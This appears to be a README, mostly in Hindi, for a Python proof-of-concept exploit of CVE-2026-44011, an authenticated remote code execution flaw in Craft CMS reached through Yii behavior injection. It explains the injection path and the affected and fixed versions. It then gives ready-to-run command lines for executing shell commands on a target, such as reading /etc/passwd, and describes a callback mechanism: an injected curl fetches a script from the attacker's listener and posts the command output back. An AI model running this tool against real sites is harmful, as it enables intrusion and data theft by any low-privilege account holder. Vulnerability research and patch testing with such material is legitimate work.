
CVE-2026-44011 के लिए Python proof-of-concept exploit, जो Yii behavior injection के माध्यम से Craft CMS में authenticated RCE है, जिसमें two-stage command output capture शामिल है।
Yii behavior injection के माध्यम से Craft CMS में Authenticated RCE।
प्रभावित: 4.0.0–4.17.11, 5.0.0–5.9.17
में ठीक किया गया: 4.17.12, 5.9.18
सलाह: GHSA-qrgm-p9w5-rrfw
/admin/actions/element-search/search endpoint एक condition parameter स्वीकार करता है जो सीधे ElementCondition::createCondition() में पास हो जाता है, बिना पहले Component::cleanseConfig() को कॉल किए। इसका मतलब है कि Yii की विशेष object-construction keys — __class, as <name> (attach behavior), on <event> (register handler) — तब प्रभावी होती हैं जब FieldLayout object request data से बनाया जाता है।
exploit AttributeTypecastBehavior को attach करता है जिसे Psy\Readline\Hoa\ConsoleProcessus::execute() (एक PSY/Yii internal जो shell commands चलाता है) को उसके typecast callable के रूप में कॉल करने के लिए configure किया गया है। यह behavior beforeSave event पर fire होता है, जिसे Craft उसी request के दौरान trigger करता है।
कोई भी account — यहाँ तक कि एक low-privilege editor — यह कर सकता है। किसी admin अधिकार की आवश्यकता नहीं है।
blind reverse shell के बजाय, यह two-stage output capture का उपयोग करता है:
curl command inject करता है जो आपके नियंत्रण वाले local HTTP listener से एक shell script fetch करता हैआपको command output सीधे terminal में मिलता है, किसी nc listener की आवश्यकता नहीं।
requests library (pip install requests)# Basic — run id on the target
python3 exploit.py \
-b http://target.com \
-u [email protected] \
-p 'password123' \
-c 'id'
# Custom control panel path
python3 exploit.py -b http://target.com -P /craftcms -u admin -p pass -c 'whoami'
# Specify your callback address when it can't be inferred
python3 exploit.py -b http://target.com -u admin -p pass -c 'cat /etc/passwd' \
-H 10.10.14.5 --listen-port 8080
# Skip TLS verification (self-signed certs)
python3 exploit.py -b https://target.com -u admin -p pass -c 'id' --no-verify
# Skip version check (e.g. version detection fails)
python3 exploit.py -b http://target.com -u admin -p pass -c 'id' --force
callback host/port वह है जहाँ target output वापस आपको POST करता है। डिफ़ॉल्ट रूप से host आपके route से target तक infer किया जाता है और port OS द्वारा assign किया जाता है। यदि target NAT या VPN के पीछे है तो आपको --callback-host को अपने reachable IP पर point करना होगा।
-b / --base-url Target origin (required)
-P / --cp-path Control panel path (default: /admin)
-u / --username Login name or email (required)
-p / --password Password (required)
-c / --command Shell command to execute (required)
-s / --site-id Craft site ID (default: 1)
-e / --element-type Element type for the condition (default: craft\elements\Category)
-t / --timeout Request timeout in seconds (default: 15)
-H / --callback-host Your reachable address for output callbacks
--listen-port Port for output listener (default: OS picks one)
--no-verify Skip TLS cert verification
-F / --force Skip version range check
केवल authorized security testing और research के लिए।